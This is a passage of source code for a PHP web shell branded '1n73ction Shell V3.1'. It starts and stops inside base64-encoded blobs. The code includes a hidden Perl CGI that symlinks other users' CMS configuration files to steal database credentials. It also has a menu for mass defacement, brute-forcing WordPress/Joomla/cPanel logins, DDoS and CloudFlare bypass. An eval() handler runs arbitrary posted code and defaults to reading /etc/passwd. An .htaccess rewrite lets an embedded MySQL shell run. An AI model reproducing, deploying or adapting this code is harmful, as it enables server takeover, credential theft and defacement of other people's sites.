vbi5waHAnLCRrb2xhLictam9vbWxhIC0gam9vbWxhIC50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSBqb29tbGEgLSBwcm90YWwudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2pvby9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gam9vLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jbXMvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictIGpvb21sYSAtIGNtcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2l0ZS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gc2l0ZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gbWFpbi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbmV3cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gbmV3cy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbmV3L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSBqb29tbGEgLSBuZXcudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictIGpvb21sYSAtIGhvbWUudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3ZiL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictIHZiLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC92YjMvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJy0gdmIzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jcGFuZWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictY3BhbmVsLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1wYW5lbC50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9zdC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1ob3N0LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob3N0aW5nL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWhvc3RpbmcudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWhvc3RzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRrb2xhLictemVuY2FydC50eHQnKTsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3plbmNhcnQvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywka29sYS4nLSB6ZW5jYXJ0IC0gc2hvcC50eHQnKTsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywka29sYS4nLXNob3AtWkNzaG9wLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvU2V0dGluZ3MucGhwJywka29sYS4nLSBzbWYudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zbWYvU2V0dGluZ3MucGhwJywka29sYS4nLSBzbWYgLSBzbWYudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9TZXR0aW5ncy5waHAnLCRrb2xhLictIHNtZiAtIGZvcnVtLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW1zL1NldHRpbmdzLnBocCcsJGtvbGEuJy0gc21mIC0gZm9ydW1zLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdXBsb2FkL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictIHVwbG9hZCAudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2wvY29uZmlnLnBocCcsJGtvbGEuJy0gbWFsYXkudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZy9rb25la3NpLnBocCcsJGtvbGEuJy0gbG9rb21lZGlhLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9zeXN0ZW0vc2lzdGVtLnBocCcsJGtvbGEuJy0gbG9rb21lZGlhLnR4dCcpOyANCiB9DQppZiAoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAnUE9TVCcpIHsNCiAgcmVhZChTVERJTiwgJGJ1ZmZlciwgJEVOVnsnQ09OVEVOVF9MRU5HVEgnfSk7DQp9IGVsc2Ugew0KICAkYnVmZmVyID0gJEVOVnsnUVVFUllfU1RSSU5HJ307DQp9DQpAcGFpcnMgPSBzcGxpdCgvJi8sICRidWZmZXIpOw0KZm9yZWFjaCAkcGFpciAoQHBhaXJzKSB7DQogICgkbmFtZSwgJHZhbHVlKSA9IHNwbGl0KC89LywgJHBhaXIpOw0KICAkbmFtZSA9fiB0ci8rLyAvOw0KICAkbmFtZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFjaygiQyIsIGhleCgkMSkpL2VnOw0KICAkdmFsdWUgPX4gdHIvKy8gLzsNCiAgJHZhbHVlID1+IHMvJShbYS1mQS1GMC05XVthLWZBLUYwLTldKS9wYWNrKCJDIiwgaGV4KCQxKSkvZWc7DQogICRGT1JNeyRuYW1lfSA9ICR2YWx1ZTsNCn0NCmlmICgkRk9STXtwYXNzfSBlcSAiIil7DQpwcmludCAnDQo8Ym9keSBjbGFzcz0ibmV3U3R5bGUxIj4NCjxwPiZuYnNwOzwvcD4NCjxmb3JtIG1ldGhvZD0icG9zdCI+DQo8dGV4dGFyZWEgbmFtZT0icGFzcyIgc3R5bGU9IndpZHRoOiA1NDNweDsgaGVpZ2h0OiA0MDBweCI+PC90ZXh0YXJlYT4NCjxiciAvPjxiciAvPg0KPGlucHV0IG5hbWU9InRhciIgdHlwZT0idGV4dCIgc3R5bGU9IndpZHRoOiAyMTJweCIgLz48YnIgLz48YnIgLz4NCjxpbnB1dCBuYW1lPSJTdWJtaXQxIiB0eXBlPSJzdWJtaXQiIHZhbHVlPSJIYWphciAuLiEiIHN0eWxlPSJ3aWR0aDogOTlweCIgLz4NCjxiciAvPg0KPC9mb3JtPic7DQp9ZWxzZXsNCkBsaW5lcyA9PCRGT1JNe3Bhc3N9PjsNCiR5ID0gQGxpbmVzOw0Kb3BlbiAoTVlGSUxFLCAiPnRhci50bXAiKTsNCnByaW50IE1ZRklMRSAidGFyIC1jemYgIi4kRk9STXt0YXJ9LiIudGFyICI7DQpmb3IgKCRrYT0wOyRrYTwkeTska2ErKyl7DQp3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiZsaWwoJDEpOw0KcHJpbnQgTVlGSUxFICQxLiIudHh0ICI7DQpmb3IoJGtkPTE7JGtkPDE4OyRrZCsrKXsNCnByaW50IE1ZRklMRSAkMS4ka2QuIi50eHQgIjsNCn0NCn0NCiB9DQpwcmludCc8Ym9keSBjbGFzcz0ibmV3U3R5bGUxIj4NCjxwPkRvbmUgISE8L3A+DQo8cD4mbmJzcDs8L3A+JzsNCmlmKCRGT1JNe3Rhcn0gbmUgIiIpew0Kb3BlbihJTkZPLCAidGFyLnRtcCIpOw0KQGxpbmVzID08SU5GTz4gOw0KY2xvc2UoSU5GTyk7DQpzeXN0ZW0oQGxpbmVzKTsNCnByaW50JzxwPjxhIGhyZWY9IicuJEZPUk17dGFyfS4nLnRhciI+IGRvd25sb2FkICBmaWxlPC9hPjwvcD4nOw0KfQ0KfQ0KIHByaW50Ig0KPC9ib2R5Pg0KPC9odG1sPiI7';
    ?>
<html><head><link rel="SHORTCUT ICON" href="http://png-3.findicons.com/files/icons/1935/red_gems_vol_2/128/r2_dragon.png"><title>=[ 1n73ct10n privat shell ]=</title>
<script type="text/javascript">
function tukar(lama,baru){
	document.getElementById(lama).style.display = 'none';
	document.getElementById(baru).style.display = 'block';
}
</script>
<style type="text/css">
body{
	background:#000000;;
}
a {
text-decoration:none;
}
a:hover{
border-bottom:1px solid #00ff00;
}
*{
	font-size:11px;
	font-family:Tahoma,Verdana,Arial;
	color:#00ff00;
}
#menu{
	background:#111111;
	margin:8px 2px 4px 2px;
}
#menu a{
	padding:4px 18px;
	margin:0;
	background:#222222;
	text-decoration:none;
	letter-spacing:2px;
	-moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
}
#menu a:hover{
	background:#191919;
	border-bottom:1px solid #333333;
	border-top:1px solid #333333;
}
.tabnet{
	margin:15px auto 0 auto;
	border: 1px solid #333333;
}
.main {
	width:100%;
}
.gaya {
	color: #00ff00;
}
.inputz{
	background:#111111;
	border:0;
	padding:2px;
	border-bottom:1px solid #222222;
	border-top:1px solid #222222;
}
.inputzbut{
	background:#111111;
	color:#00ff00;
	margin:0 4px;
	border:1px solid #444444;

}
.inputz:hover, .inputzbut:hover{
	border-bottom:1px solid #00ff00;
	border-top:1px solid #00ff00;
}
.output {
	margin:auto;
	border:1px solid #00ff00;
	width:100%;
	height:400px;
	background:#000000;
	padding:0 2px;
}
.cmdbox{
	width:100%;
}
.head_info{
	padding: 0 4px;
}
.jaya{ font-family: ;}

.b374k{
	font-size:30px;
	padding:0;
	color:#444444;
}
.b374k_tbl{
	text-align:center;
	margin:0 4px 0 0;
	padding:0 4px 0 0;
	border-right:1px solid #333333;
}
.phpinfo table{
	width:100%;
	padding:0 0 0 0;
}
.phpinfo td{
	background:#111111;
	color:#cccccc;
padding:6px 8px;;
}
.phpinfo th, th{
	background:#191919;
	border-bottom:1px solid #333333;
font-weight:normal;
}
.phpinfo h2, .phpinfo h2 a{
	text-align:center;
	font-size:16px;
	padding:0;
	margin:30px 0 0 0;
	background:#222222;
	padding:4px 0;
}
.explore{
width:100%;
}
.explore a {
text-decoration:none;
}
.explore td{
border-bottom:1px solid #333333;
padding:0 8px;
line-height:24px;
}
.explore th{
padding:3px 8px;
font-weight:normal;
}
.explore th:hover , .phpinfo th:hover{
border-bottom:1px solid #00ff00;
}
.explore tr:hover{
background:#111111;
}
.viewfile{
background:#EDECEB;
color:#000000;
margin:4px 2px;
padding:8px;
}
.sembunyi{
display:none;
padding:0;margin:0;
}

</style></head>
<script language='javascript'>
if (document.all||document.getElementById){
var thetitle=document.title
document.title=''
}
var data="Us3 Y0ur br41n biTch ! ! !";
var done=1;
function statusIn(text){
decrypt(text,22,22);
}
function statusOut(){
self.status='';
done=1;
}
function decrypt(text, max, delay){
if (done){
done = 0;
rantit(text, max, delay, 0, max);
} 
}
function rantit(text, runs_left, delay, charvar, max){
if (!done){
runs_left = runs_left - 1;
var status = text.substring(0,charvar);
for(var current_char = charvar; current_char < text.length; current_char++){
status += data.charAt(Math.round(Math.random()*data.length));
}
document.title = status;
var rerun = "rantit('" + text + "'," + runs_left + "," + delay + "," + charvar + "," + max + ");"
var new_char = charvar + 1;
var next_char = "rantit('" + text + "'," + max + "," + delay + "," + new_char + "," + max + ");"
if(runs_left > 0){
setTimeout(rerun, delay);
}
else{
if (charvar < text.length){
setTimeout(next_char, Math.round(delay*(charvar+3)/(charvar+1)));
}
else
{
done = 1;
}
}
}
}
if (document.all||document.getElementById)
statusIn(thetitle)
</script>

<body onLoad="document.getElementById('cmd').focus();">
<div class="main">
<!-- head info start here -->
<div class="head_info">
<table ><tr>
<td><table class="b374k_tbl"><tr><td><a href="?"><span class="b374k"><img src="http://www.fbvideo.16mb.com/files/1n73ction.png" /></span></a></td></tr><tr><td><b>1n73ction Shell V3.1 [ Special Edition ]</b></td></tr></table></td>
<td><?php 
    echo $buff;
    ?></td>
</tr></table>
</div>
<!-- head info end here -->
<!-- menu start -->
<center><div id="menu">
<a href="?<?php 
    echo "y=" . $pwd;
    ?>"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxQ2GRnu/TgAAAJzSURBVDjLtZLPSxtBHMXf5semZDfS7KpIaWzRShoFD5UK9h6ai5eCPfZkwYJ4kF566a30H0gF24BUqDdjBT1VCFIsNBUWEw+ha2obpDGUXGR1Z7KZ+fbQRky1vfULAzPD4/MeMw/4H7O6ugoAsG17tFwuJwFgd3f3Qq3yN0g+n7+r6/oKgEtQMDWYGHx5kc539rC4uAgA2Hy/OaGq6oplWaVcLmdxxl9YlvUEALa2tv6dYGPjXSoS6chWKpWKaZpdoVBIL5VK+0NDQ/1END02NjZ/LsHc3BwAYG1tbSIYVLOFQuGzpmldgUDAkFKqvb2917a3t23GWDqXyz0BgPX19fYEy8vLKV3XswcHBxXDMLoikYghpaRW0kajwfbK5W834/F+ANOpVGr+FLC0tHRf0/TX+/tf7J6eniuappkA6IwBtSC2bX9NJBIDRPT05OTkuTL1aKpj9Pbox1qtdmgYxlXTNG8QEV3wPgRAcV23bllWfmRkZNh13VuKpmnBvr6+O1LK2szMzNtwOBxviYUQUBQFPp+vBYCU8jCTyaSOj48vA/hw6jI+Ph5JJpOfwuFwnIjAGKsvLCw8cxxHTE4+fGwY0RgRgYi+O44zPDs7W2/rgeu6CmMMjDFwziGE+JFIJF5Vq9VMs+kdcs7BOQdjDEdHR6fGgdZGCAHOOfx+P4gIQggZjUaps9OkRqNBjDHQr1E8z8M5QLVaheM4TZ/fBxDQbDZVz/MgJYFzHlRVFURQms2GqNfr4qIm+mOx2L3u7u5hKSVCIXVPSvGmsFNUBuLxB8FA4DoAeJ63UywWswBk2x+l0+kW0P97KX80tnXfNj8B5NE5DOMV2T0AAAAASUVORK5CYII=' height="18" width="34"></a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=shell">Shell</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=php">Eval</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=sql">Mysql</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=dump">Database Dump</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=phpinfo">Php Info</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=netsploit">Net Sploit</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=upload">Upload</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=mail">E-Mail</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=sqli-scanner">SQLI Scan</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=port-sc">Port Scan</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=dos">Ddos</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=tool">Tools</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=python">python</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=symlink">Symlink</a><br><br>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=config">Config</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=bypass">Bypass</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=cgi">CgiShell</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=cgi2012">CGI Telnet 2012</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=domain">Domain</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=jodexer">Joomla IndChange</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=vb">VB IndChange</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=wp-reset">Wordpress ResPass</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=jm-reset">Joomla ResPass</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=whmcs">WHMCS Decoder</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=zone">Zone-H</a><br><br>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=mass">Mass Deface</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=wpbrute">Wordpress BruteForce</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=jbrute">Joomla BruteForce</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=brute">Cpanel BruteForce</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=bypass-cf">Bypass CloudFlare</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=adfin">Admin Finder</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=hash">Password Hash</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=hashid">Hash ID</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=string">Script Encode</a><br><br>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=whois">Website Whois</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=jss">Joomla Server Scanner</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=cms_detect">Cms Detector</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=tutor">Tutorial & Ebook</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=about">About</a>
<a href="?<?php 
    echo "y=" . $pwd;
    ?>&amp;x=logout">Log-Out</a>


</div></center>
<!-- menu end -->

<?php 
    @ini_set('display_errors', 0);
    if (isset($_GET['x']) && $_GET['x'] == 'php') {
        ?>
<form action="?y=<?php 
        echo $pwd;
        ?>&amp;x=php" method="post">
<table class="cmdbox">
<tr><td>
<textarea class="output" name="cmd" id="cmd">
<?php 
        if (isset($_POST['submitcmd'])) {
            echo eval(magicboom($_POST['cmd']));
        } else {
            echo "echo file_get_contents('/etc/passwd');";
        }
        ?>
</textarea>
<tr><td><input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form>
</table>
</form>

<?php 
    } elseif (isset($_GET['x']) && $_GET['x'] == 'sql') {
        ?>
<form action="?y=<?php 
        echo $pwd;
        ?>&amp;x=sql" method="post">
<?php 
        echo "<center/><br/><b><font color=#00ff00>+--==[ Mysql Interface ]==--+</font></b><br><br>";
        mkdir('mysql', 0755);
        chdir('mysql');
        $akses = ".htaccess";
        $buka_lah = ".htaccess";
        $buka = fopen($buka_lah, 'w') or die("Error cuyy!");
        $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI\r\nAddType application/x-httpd-php .cpc\r\n";
        fwrite($buka, $metin);
        fclose($buka);
        $sqlshell = 'PD8NCiRQQVNTV09SRCA9ICJyb290X3hoYWhheCI7DQokVVNFUk5BTUUgPSAieGhhaGF4IjsNCmlmICggZnVuY3Rpb25fZXhpc3RzKCdpbmlfZ2V0JykgKSB7DQoJJG9ub2ZmID0gaW5pX2dldCgncmVnaXN0ZXJfZ2xvYmFscycpOw0KfSBlbHNlIHsNCgkkb25vZmYgPSBnZXRfY2ZnX3ZhcigncmVnaXN0ZXJfZ2xvYmFscycpOw0KfQ0KaWYgKCRvbm9mZiAhPSAxKSB7DQoJQGV4dHJhY3QoJEhUVFBfU0VSVkVSX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfQ09PS0lFX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfUE9TVF9GSUxFUywgRVhUUl9TS0lQKTsNCglAZXh0cmFjdCgkSFRUUF9QT1NUX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfR0VUX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfRU5WX1ZBUlMsIEVYVFJfU0tJUCk7DQp9DQoNCmZ1bmN0aW9uIGxvZ29uKCkgew0KCWdsb2JhbCAkUEhQX1NFTEY7DQoJc2V0Y29va2llKCAibXlzcWxfd2ViX2FkbWluX3VzZXJuYW1lIiApOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl9wYXNzd29yZCIgKTsNCglzZXRjb29raWUoICJteXNxbF93ZWJfYWRtaW5faG9zdG5hbWUiICk7DQoJZWNobyAiPHRhYmxlIHdpZHRoPTEwMCUgaGVpZ2h0PTEwMCU+PHRyPjx0ZD48Y2VudGVyPlxuIjsNCgllY2hvICI8dGFibGUgY2VsbHBhZGRpbmc9Mj48dHI+PHRkPjxjZW50ZXI+XG4iOw0KCWVjaG8gIjx0YWJsZSBjZWxscGFkZGluZz0yMD48dHI+PHRkPjxjZW50ZXI+XG4iOw0KCWVjaG8gIjxoMT5NeVNRTCBJbnRlcmZhY2UgQnkgUzRNUDRIPC9oMT5cbiI7DQoJZWNobyAiPGZvcm0gYWN0aW9uPSckUEhQX1NFTEYnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9Ykc5bmIyNWZjM1ZpYldsMD5cbiI7DQoJZWNobyAiPHRhYmxlIGNlbGxwYWRkaW5nPTUgY2VsbHNwYWNpbmc9MT5cbiI7DQoJZWNobyAiPHRyPjx0ZCBjbGFzcz1cIm5ld1wiPkhvc3RuYW1lIDwvdGQ+PHRkPiA8aW5wdXQgdHlwZT10ZXh0IG5hbWU9aG9zdG5hbWUgdmFsdWU9J2xvY2FsaG9zdCc+PC90ZD48L3RyPlxuIjsNCgllY2hvICI8dHI+PHRkIGNsYXNzPVwibmV3XCI+VXNlcm5hbWUgPC90ZD48dGQ+IDxpbnB1dCB0eXBlPXRleHQgbmFtZT11c2VybmFtZT48L3RkPjwvdHI+XG4iOw0KCWVjaG8gIjx0cj48dGQgY2xhc3M9XCJuZXdcIj5QYXNzd29yZCA8L3RkPjx0ZD4gPGlucHV0IHR5cGU9cGFzc3dvcmQgbmFtZT1wYXNzd29yZD48L3RkPjwvdHI+XG4iOw0KCWVjaG8gIjwvdGFibGU+PHA+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0nRW50ZXInPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1yZXNldCB2YWx1ZT0nQ2xlYXInPjxicj5cbiI7DQoJZWNobyAiPC9mb3JtPlxuIjsNCgllY2hvICI8L2NlbnRlcj48L3RkPjwvdHI+PC90YWJsZT5cbiI7DQoJZWNobyAiPC9jZW50ZXI+PC90ZD48L3RyPjwvdGFibGU+XG4iOw0KCWVjaG8gIjxwPjxociB3aWR0aD0zMDA+XG4iOw0KCWVjaG8gIjwvY2VudGVyPjwvdGQ+PC90cj48L3RhYmxlPlxuIjsNCn0NCg0KZnVuY3Rpb24gbG9nb25fc3VibWl0KCkgew0KCWdsb2JhbCAkdXNlcm5hbWUsICRwYXNzd29yZCwgJGhvc3RuYW1lICwkUEhQX1NFTEY7DQoJaWYoJGhvc3RuYW1lID09JycpDQoJCSRob3N0bmFtZSA9ICdsb2NhbGhvc3QnOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl91c2VybmFtZSIsICR1c2VybmFtZSApOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl9wYXNzd29yZCIsICRwYXNzd29yZCApOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl9ob3N0bmFtZSIsICRob3N0bmFtZSApOw0KCWVjaG8gIjxNRVRBIEhUVFAtRVFVSVY9UmVmcmVzaCBDT05URU5UPScwOyBVUkw9JFBIUF9TRUxGP2FjdGlvbj1iR2x6ZEVSQ2N3PT0nPiI7DQp9DQoNCmZ1bmN0aW9uIGVjaG9RdWVyeVJlc3VsdCgpIHsNCglnbG9iYWwgJHF1ZXJ5U3RyLCAkZXJyTXNnOw0KCWlmKCAkZXJyTXNnID09ICIiICkgJGVyck1zZyA9ICJTdWNjZXNzIjsNCglpZiggJHF1ZXJ5U3RyICE9ICIiICkgew0KCQllY2hvICI8dGFibGUgY2VsbHBhZGRpbmc9NT5cbiI7DQoJCWVjaG8gIjx0cj48dGQ+UXVlcnk8L3RkPjx0ZD4kcXVlcnlTdHI8L3RkPjwvdHI+XG4iOw0KCQllY2hvICI8dHI+PHRkPlJlc3VsdDwvdGQ+PHRkPiRlcnJNc2c8L3RkPjwvdHI+XG4iOw0KCQllY2hvICI8L3RhYmxlPjxwPlxuIjsNCgl9DQp9DQoNCmZ1bmN0aW9uIGxpc3REYXRhYmFzZXMoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJFBIUF9TRUxGOw0KCWVjaG8gIjxoMT5EYXRhYmFzZXMgTGlzdDwvaDE+XG4iOw0KCWVjaG8gIjxmb3JtIGFjdGlvbj0nJFBIUF9TRUxGJz5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9YWN0aW9uIHZhbHVlPWNyZWF0ZURCPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT10ZXh0IG5hbWU9ZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9J0NyZWF0ZSBEYXRhYmFzZSc+XG4iOw0KCWVjaG8gIjwvZm9ybT5cbiI7DQoJZWNobyAiPGhyPlxuIjsNCgllY2hvICI8dGFibGUgY2VsbHNwYWNpbmc9MSBjZWxscGFkZGluZz01PlxuIjsNCgkkcERCID0gbXlzcWxfbGlzdF9kYnMoICRteXNxbEhhbmRsZSApOw0KCSRudW0gPSBteXNxbF9udW1fcm93cyggJHBEQiApOw0KCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCSRkYm5hbWUgPSBteXNxbF9kYm5hbWUoICRwREIsICRpICk7DQoJCWVjaG8gIjx0cj5cbiI7DQoJCWVjaG8gIjx0ZD4kZGJuYW1lPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWxpc3RUYWJsZXMmZGJuYW1lPSRkYm5hbWUnPlRhYmxlczwvYT48L3RkPlxuIjsNCgkJZWNobyAiPHRkPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZHJvcERCJmRibmFtZT0kZGJuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0Ryb3AgRGF0YWJhc2UgXCckZGJuYW1lXCc/JylcIj5Ecm9wPC9hPjwvdGQ+XG4iOw0KCQllY2hvICI8dGQ+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1kdW1wREImZGJuYW1lPSRkYm5hbWUnIG9uQ2xpY2s9XCJyZXR1cm4gY29uZmlybSgnRHVtcCBEYXRhYmFzZSBcJyRkYm5hbWVcJz8nKVwiPkR1bXA8L2E+PC90ZD5cbiI7DQoJCWVjaG8gIjwvdHI+XG4iOw0KCX0NCgllY2hvICI8L3RhYmxlPlxuIjsNCn0NCg0KZnVuY3Rpb24gY3JlYXRlRGF0YWJhc2UoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJFBIUF9TRUxGOw0KCW15c3FsX2NyZWF0ZV9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJbGlzdERhdGFiYXNlcygpOw0KfQ0KDQpmdW5jdGlvbiBkcm9wRGF0YWJhc2UoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJFBIUF9TRUxGOw0KCW15c3FsX2Ryb3BfZGIoICRkYm5hbWUsICRteXNxbEhhbmRsZSApOw0KCWxpc3REYXRhYmFzZXMoKTsNCn0NCg0KZnVuY3Rpb24gbGlzdFRhYmxlcygpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkUEhQX1NFTEY7DQoJZWNobyAiPGgxPlRhYmxlcyBMaXN0PC9oMT5cbiI7DQoJZWNobyAiPHAgY2xhc3M9bG9jYXRpb24+JGRibmFtZTwvcD5cbiI7DQoJZWNob1F1ZXJ5UmVzdWx0KCk7DQoJZWNobyAiPGZvcm0gYWN0aW9uPSckUEh